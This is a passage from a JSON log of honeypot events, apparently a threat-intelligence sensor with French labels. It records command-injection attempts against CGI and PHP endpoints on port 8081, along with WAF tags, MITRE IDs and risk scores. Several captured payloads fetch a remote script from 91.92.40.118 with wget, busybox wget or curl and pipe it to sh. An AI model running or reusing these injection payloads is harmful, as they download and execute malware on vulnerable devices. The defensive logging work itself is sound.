\u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nConnection: close\\r\\n\\r\\nsetCookie=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxsc;busybox wget http:\/\/91.92.40.118\/wget.s\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00229e6d84ca3516d4a09daa6995bd5201a5c8ba403a\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/export-cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/export-cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":319},{"id":11809711,"ip":"45.153.34.252","ts":"2026-07-14 02:29:59.000000","proto":"tcp","src_port":55114,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/remote_help-cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00224470cfe23acda62fbb5ae9d06314c68f4f66bdc0\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 318, \u0022payload_entropy\u0022: 5.229869844627455, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022bf38ea8cef8d51c26c553a16765c473947b2c4c8\u0022, \u0022event_fingerprint\u0022: \u0022f32ef2f7bcf61ba88cea0548e8950d59b494b854\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022ad7ed13e421fd25bc2f443a920ce627d\u0022, \u0022path_pattern_hash\u0022: \u0022081a0659a19fb0d32ca77af7f68355fe\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: \u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxrh;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxrh;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022679e1f090d2f205a9d0d6e13b2a10bdbceb0911c\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_help-cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_help-cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":318},{"id":11809709,"ip":"45.153.34.252","ts":"2026-07-14 02:29:58.000000","proto":"tcp","src_port":55096,"dst_port":8081,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022330403c8b337dfacdd10ced73c0bc7b3134b9027\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 278, \u0022payload_entropy\u0022: 5.036637947923816, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022e49bf17027a831ec024ae0b04812f660e56acdbc\u0022, \u0022event_fingerprint\u0022: \u0022e5392c52f3bbaf9a6401a625268d2a1157158777\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, 